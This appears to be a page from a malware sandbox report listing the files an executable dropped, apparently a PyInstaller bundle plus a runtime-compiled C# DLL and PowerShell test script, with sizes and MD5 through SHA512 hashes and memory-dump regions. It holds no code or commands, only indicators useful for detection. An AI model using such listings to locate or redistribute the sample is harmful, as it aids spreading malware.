1a351ae96f6aa9d303a2cd8580a224b32f6dfa694db8ae75f494b5452fda341b8592e3fc2162fab022a6a11a5985b56d91abb05d15c35721cf28452af0834de9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_brotli.cp310-win_amd64.pyd

Filesize
801KB

MD5
ee3d454883556a68920caaedefbc1f83

SHA1
45b4d62a6e7db022e52c6159eef17e9d58bec858

SHA256
791e7195d7df47a21466868f3d7386cff13f16c51fcd0350bf4028e96278dff1

SHA512
e404adf831076d27680cc38d3879af660a96afc8b8e22ffd01647248c601f3c6c4585d7d7dc6bbd187660595f6a48f504792106869d329aa1a0f3707d7f777c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_bz2.pyd

Filesize
81KB

MD5
bbe89cf70b64f38c67b7bf23c0ea8a48

SHA1
44577016e9c7b463a79b966b67c3ecc868957470

SHA256
775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723

SHA512
3ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_cffi_backend.cp310-win_amd64.pyd

Filesize
177KB

MD5
ebb660902937073ec9695ce08900b13d

SHA1
881537acead160e63fe6ba8f2316a2fbbb5cb311

SHA256
52e5a0c3ca9b0d4fc67243bd8492f5c305ff1653e8d956a2a3d9d36af0a3e4fd

SHA512
19d5000ef6e473d2f533603afe8d50891f81422c59ae03bead580412ec756723dc3379310e20cd0c39e9683ce7c5204791012e1b6b73996ea5cb59e8d371de24

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_ctypes.pyd

Filesize
119KB

MD5
ca4cef051737b0e4e56b7d597238df94

SHA1
583df3f7ecade0252fdff608eb969439956f5c4a

SHA256
e60a2b100c4fa50b0b144cf825fe3cde21a8b7b60b92bfc326cb39573ce96b2b

SHA512
17103d6b5fa84156055e60f9e5756ffc31584cdb6274c686a136291c58ba0be00238d501f8acc1f1ca7e1a1fadcb0c7fefddcb98cedb9dd04325314f7e905df3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_decimal.pyd

Filesize
242KB

MD5
6339fa92584252c3b24e4cce9d73ef50

SHA1
dccda9b641125b16e56c5b1530f3d04e302325cd

SHA256
4ae6f6fb3992bb878416211221b3d62515e994d78f72eab51e0126ca26d0ee96

SHA512
428b62591d4eba3a4e12f7088c990c48e30b6423019bebf8ede3636f6708e1f4151f46d442516d2f96453694ebeef78618c0c8a72e234f679c6e4d52bebc1b84

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_hashlib.pyd

Filesize
60KB

MD5
d856a545a960bf2dca1e2d9be32e5369

SHA1
67a15ecf763cdc2c2aa458a521db8a48d816d91e

SHA256
cd33f823e608d3bda759ad441f583a20fc0198119b5a62a8964f172559acb7d3

SHA512
34a074025c8b28f54c01a7fd44700fdedb391f55be39d578a003edb90732dec793c2b0d16da3da5cdbd8adbaa7b3b83fc8887872e284800e7a8389345a30a6a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_lzma.pyd

Filesize
153KB

MD5
0a94c9f3d7728cf96326db3ab3646d40

SHA1
8081df1dca4a8520604e134672c4be79eb202d14

SHA256
0a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31

SHA512
6f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_queue.pyd

Filesize
29KB

MD5
52d0a6009d3de40f4fa6ec61db98c45c

SHA1
5083a2aff5bcce07c80409646347c63d2a87bd25

SHA256
007bcf19d9b036a7e73f5ef31f39bfb1910f72c9c10e4a1b0658352cfe7a8b75

SHA512
cd552a38efaa8720a342b60318f62320ce20c03871d2e50d3fa3a9a730b84dacdbb8eb4d0ab7a1c8a97215b537826c8dc532c9a55213bcd0c1d13d7d8a9ad824

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_socket.pyd

Filesize
75KB

MD5
0f5e64e33f4d328ef11357635707d154

SHA1
8b6dcb4b9952b362f739a3f16ae96c44bea94a0e

SHA256
8af6d70d44bb9398733f88bcfb6d2085dd1a193cd00e52120b96a651f6e35ebe

SHA512
4be9febb583364da75b6fb3a43a8b50ee29ca8fc1dda35b96c0fcc493342372f69b4f27f2604888bca099c8d00f38a16f4c9463c16eff098227d812c29563643

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_sqlite3.pyd

Filesize
95KB

MD5
9f38f603bd8f7559609c4ffa47f23c86

SHA1
8b0136fc2506c1ccef2009db663e4e7006e23c92

SHA256
28090432a18b59eb8cbe8fdcf11a277420b404007f31ca571321488a43b96319

SHA512
273a19f2f609bede9634dae7c47d7b28d369c88420b2b62d42858b1268d6c19b450d83877d2dba241e52755a3f67a87f63fea8e5754831c86d16e2a8f214ad72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\_ssl.pyd

Filesize
155KB

MD5
9ddb64354ef0b91c6999a4b244a0a011

SHA1
86a9dc5ea931638699eb6d8d03355ad7992d2fee

SHA256
e33b7a4aa5cdd5462ee66830636fdd38048575a43d06eb7e2f688358525ddeab

SHA512
4c86478861fa4220680a94699e7d55fbdc90d2785caee10619cecb058f833292ee7c3d6ac2ed1ef34b38fbff628b79d672194a337701727a54bb6bbc5bf9aeca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\base_library.zip

Filesize
859KB

MD5
b7dcfa81e9190367c5d7a76456f54008

SHA1
cb5b78a15744f70d6b798ccc79215a5d433a07a7

SHA256
1e7a843e18e08f8753b1edb52dc62a7adc334dce8f5ccad8c823c3436e041867

SHA512
1b25cdbc7aa555c4bf270a5828c84235885400e6829bc1e6f6965d68582165b1f7d8e52e36695f6fc101d0fe34ea03af329e62375e5111224a135ee31f83a9d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\certifi\cacert.pem

Filesize
287KB

MD5
2a6bef11d1f4672f86d3321b38f81220

SHA1
b4146c66e7e24312882d33b16b2ee140cb764b0e

SHA256
1605d0d39c5e25d67e7838da6a17dcf2e8c6cfa79030e8fb0318e35f5495493c

SHA512
500dfff929d803b0121796e8c1a30bdfcb149318a4a4de460451e093e4cbd568cd12ab20d0294e0bfa7efbd001de968cca4c61072218441d4fa7fd9edf7236d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\charset_normalizer\md.cp310-win_amd64.pyd

Filesize
10KB

MD5
f33ca57d413e6b5313272fa54dbc8baa

SHA1
4e0cabe7d38fe8d649a0a497ed18d4d1ca5f4c44

SHA256
9b3d70922dcfaeb02812afa9030a40433b9d2b58bcf088781f9ab68a74d20664

SHA512
f17c06f4202b6edbb66660d68ff938d4f75b411f9fab48636c3575e42abaab6464d66cb57bce7f84e8e2b5755b6ef757a820a50c13dd5f85faa63cd553d3ff32

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\charset_normalizer\md__mypyc.cp310-win_amd64.pyd

Filesize
117KB

MD5
494f5b9adc1cfb7fdb919c9b1af346e1

SHA1
4a5fddd47812d19948585390f76d5435c4220e6b

SHA256
ad9bcc0de6815516dfde91bb2e477f8fb5f099d7f5511d0f54b50fa77b721051

SHA512
2c0d68da196075ea30d97b5fd853c673e28949df2b6bf005ae72fd8b60a0c036f18103c5de662cac63baaef740b65b4ed2394fcd2e6da4dfcfbeef5b64dab794

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\libcrypto-1_1.dll

Filesize
3.3MB

MD5
6f4b8eb45a965372156086201207c81f

SHA1
8278f9539463f0a45009287f0516098cb7a15406

SHA256
976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541

SHA512
2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\libssl-1_1.dll

Filesize
686KB

MD5
8769adafca3a6fc6ef26f01fd31afa84

SHA1
38baef74bdd2e941ccd321f91bfd49dacc6a3cb6

SHA256
2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071

SHA512
fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\python3.DLL

Filesize
63KB

MD5
c17b7a4b853827f538576f4c3521c653

SHA1
6115047d02fbbad4ff32afb4ebd439f5d529485a

SHA256
d21e60f3dfbf2bab0cc8a06656721fa3347f026df10297674fc635ebf9559a68

SHA512
8e08e702d69df6840781d174c4565e14a28022b40f650fda88d60172be2d4ffd96a3e9426d20718c54072ca0da27e0455cc0394c098b75e062a27559234a3df7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\python310.dll

Filesize
4.3MB

MD5
deaf0c0cc3369363b800d2e8e756a402

SHA1
3085778735dd8badad4e39df688139f4eed5f954

SHA256
156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d

SHA512
5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\select.pyd

Filesize
28KB

MD5
c119811a40667dca93dfe6faa418f47a

SHA1
113e792b7dcec4366fc273e80b1fc404c309074c

SHA256
8f27cd8c5071cb740a2191b3c599e99595b121f461988166f07d9f841e7116b7

SHA512
107257dbd8cf2607e4a1c7bef928a6f61ebdfc21be1c4bdc3a649567e067e9bb7ea40c0ac8844d2cedd08682447b963148b52f85adb1837f243df57af94c04b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\sqlite3.dll

Filesize
1.4MB

MD5
aaf9fd98bc2161ad7dff996450173a3b

SHA1
ab634c09b60aa18ea165084a042d917b65d1fe85

SHA256
f1e8b6c4d61ac6a320fa2566da9391fbfd65a5ac34ac2e2013bc37c8b7b41592

SHA512
597ffe3c2f0966ab94fbb7ecac27160c691f4a07332311f6a9baf8dec8b16fb16ec64df734c3bdbabf2c0328699e234d14f1b8bd5ac951782d35ea0c78899e5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21322\unicodedata.pyd

Filesize
1.1MB

MD5
4c8af8a30813e9380f5f54309325d6b8

SHA1
169a80d8923fb28f89bc26ebf89ffe37f8545c88

SHA256
4b6e3ba734c15ec789b5d7469a5097bd082bdfd8e55e636ded0d097cf6511e05

SHA512
ea127779901b10953a2bf9233e20a4fab2fba6f97d7baf40c1b314b7cd03549e0f4d2fb9bad0fbc23736e21eb391a418d79a51d64402245c1cd8899e4d765c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sicwbd3k.gpk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pq5xxsmg\pq5xxsmg.dll

Filesize
3KB

MD5
0fef8b1c337746f2678e51e43ad8e436

SHA1
e7ca14525768af4509d68e97a3d55adff85eac83

SHA256
db0818349de73415e315be36778daa943aff4f380d325481436172eb03b1d76e

SHA512
8ed617f73601c512c6bcf2039f0a7e5ed42b0bda4adc68a3c274868aa064e4d2dae1099b8c0113f38d53da6130a4a7743877964eafefa374e05a3d5244017a1b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pq5xxsmg\CSCFBF6CBE18C164717B47456199D8B9D2.TMP

Filesize
652B

MD5
071e74a44ad9324b4bcb4733ed0c5c69

SHA1
76c617c23c63e23b7e46cbc4bffbe9489cd12234

SHA256
643cfbef82c5242882254ab755b670ee70df61492a0710a50cecce473c19c6f4

SHA512
81ac5a94a1ddc6f7435a7e5c8598809961ad423b9f2248d00fd9d5630519dcad66849e733747192199b9651bd4a274270a87f92d8c59f966a3451ce5a23ee637

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pq5xxsmg\pq5xxsmg.0.cs

Filesize
737B

MD5
3d57f8f44297464baafa6aeecd3bf4bc

SHA1
f370b4b9f8dba01fbcad979bd663d341f358a509

SHA256
415199eec01052503978381a4f88f4cd970b441fedce519905990ed8b629b0f1

SHA512
4052dd65ca0a505a36c7c344671afcadb8f82cc24b0d1d8362f61565f9d37782e00332908444f6a95286dd1785d074762b27c20be1f361eec67807fad052d798

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pq5xxsmg\pq5xxsmg.cmdline

Filesize
369B

MD5
a7ee328ab35c4f98b841a9e86193a846

SHA1
b66bc59cc3c67cfecf96c56d6fe689a2a665e527

SHA256
9b5be89839d93735df068c78e24c83a56096523649e42d61cd979eb17f6b9e95

SHA512
957fe803d7cdd10b38254d6e9ca39940cad17930b1e6883e8cbc5616d82443641d0f3ad74b06fe98652fe2645e34c6619ecff474d1745a7cac059ff0770b154f

Download Submit
memory/1520-267-0x000002705E5D0000-0x000002705E5D8000-memory.dmp

Filesize
32KB

Download
memory/1536-138-0x00000141B9E30000-0x00000141B9E38000-memory.dmp

Filesize
32KB

Download
memory/1536-124-0x00000141D4BA0000-0x00000141D5346000-memory.dmp

Filesize
7.6MB

Download
memory/1536-81-0x00000141B9DC0000-0x00000141B9DE2000-memory.dmp

Filesize
136KB

Download
memory/4332-151-0x000002A638C10000-0x000002A638C21000-memory.dmp

Filesize
68KB

Download
memory/4332-152-0x000002A638E90000-0x000002A638EA0000-memory.dmp

Filesize
64KB

Download